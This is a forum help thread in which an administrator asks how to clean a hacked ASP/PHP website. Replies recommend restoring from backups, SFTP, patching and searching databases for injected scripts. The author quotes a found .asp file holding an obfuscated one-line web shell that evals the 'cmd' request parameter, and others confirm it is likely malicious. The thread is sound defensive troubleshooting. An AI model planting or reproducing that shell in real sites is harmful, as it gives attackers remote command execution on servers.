• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 266
  • Last Modified:

Cleaning up a hacked website

I've been assigned to clean up a website that's been hacked somehow.

If I understand it correctly, the website runs ASP code (suspect it's not ASP.NET but not sure how to check) connecting to several Access databases. It also has a section of the site using the PHP CodeIgniter framework. It's suspected that the attacker initially gained access through a weak FTP password.

After an initial clean up and a change of the FTP password, more malicious activity was detected. I suppose it's possible the avenue for this attack may have been different to the initial one.

I've found 9 ASP files that are clearly malicious. However, I'm not particularly familiar with the code on the site and am very aware that I'm unlikely to find them all, so I'm trying to get hold of a backup prior to the initial hack, for comparison purposes. If available, I will try to restore the programming files to what was there prior to the hack.

Are there any tools I can use that might detect malicious files with reasonable accuracy? Are there any neat tricks I can use to at least detect malicious behaviour? Is there anything else that would be useful to know or try?
Terry Woods
Terry Woods
5 Solutions
I wish I could provide clever answers to your questions, but honestly I treat hacked websites/webservers like I treat virused/malware infected computers, wipe and reload the machine and restore from a known good backup.

Once a machine has been compromised, there is no guarantee that you can catch everything and undo the damage.

Good luck!
Paul MacDonaldDirector, Information SystemsCommented:
Code is code and there's rarely a way to define intent without human intervention.  As it is, your best bet is to restore from a known good backup.  If that can't be done, you'll probably have to go through each page, one-at-a-time.  

Be aware the hacker may have compromised the operating system itself.  This wouldn't normally be possible, but if the web site and/or FTP site were running as users with sufficient permissions, the hacker could have put (or written code to put) files anywhere.
As a side note - regular FTP is done over plain text. There's no encryption, so anyone that listens to the communication can see the password, no matter how complex / strong it is. Always use SFTP or FTPS (whatever your server supports) for transferring / managing files.

More often than not, hacks are due to vulnerabilities in the code or an unpatched system. Maybe the server hasn't been keeping up with security updates, or maybe you've downloaded some 3rd party code that had a vulnerability in it. For example, PHPMyAdmin was a common script that a lot of people used for years, but there were vulnerabilities in it and people could get hacked just by having it on their web server. There may be ASP equivalents.

ASP.NET code typically is in files with the extension .aspx, while classic ASP uses .asp as the extension.
Increase Security & Decrease Risk with NSPM Tools

Analyst firm, Enterprise Management Associates (EMA) reveals significant benefits to enterprises when using Network Security Policy Management (NSPM) solutions, while organizations without, experienced issues including non standard security policies and failed cloud migrations

Big MontySenior Web Developer / CEO of ExchangeTree.org Commented:
another place you'll want to check is in your database. if you have any kind of data collection (ex - forms) and you don't sanitize the input, hackers in theory could save malicious html and when that data is written out to the screen, you have been hacked.

do a search in any text or varchar fields in your database on the string "<script" (w/out the quotes) and that'll tell you if any bad scripts have been saved to your database
Terry WoodsIT GuruAuthor Commented:
It's pretty much as I thought then. I'm waiting to see what backups I have available. I suspect I may have to retain the current copy of the databases though, so @Big_Monty's suggestion on what to look for in the databases could be very useful.

I thought the contents of this .asp file were interesting:
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("cmd"))%

The characters spell out "request". Would this be malicious by any chance? This particular file was date stamped differently to the other malicious ones I found, but I guess one of the easy hacker tricks would be to encourage the victim to think they have found all the malicious files through date stamping most of them with the date of the hack... anyway, I'm not going to put much more time into trying to find individual files since it's probably a fruitless exercise.
Big MontySenior Web Developer / CEO of ExchangeTree.org Commented:
most likely that page is a hack as well, do a search for that string and some shady sites come up talking about viruses and trojans....
Scott Fell, EE MVEDeveloper & EE ModeratorCommented:
It's possible that they used code to create files on the fly.  I would look at the logs too and see if you can find some odd query string requests on a particular page.
Terry WoodsIT GuruAuthor Commented:
Thanks all for your help!
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

Join & Write a Comment

Featured Post

Free Tool: Subnet Calculator

The subnet calculator helps you design networks by taking an IP address and network mask and returning information such as network, broadcast address, and host range.

One of a set of tools we're offering as a way of saying thank you for being a part of the community.

Tackle projects and never again get stuck behind a technical roadblock.
Join Now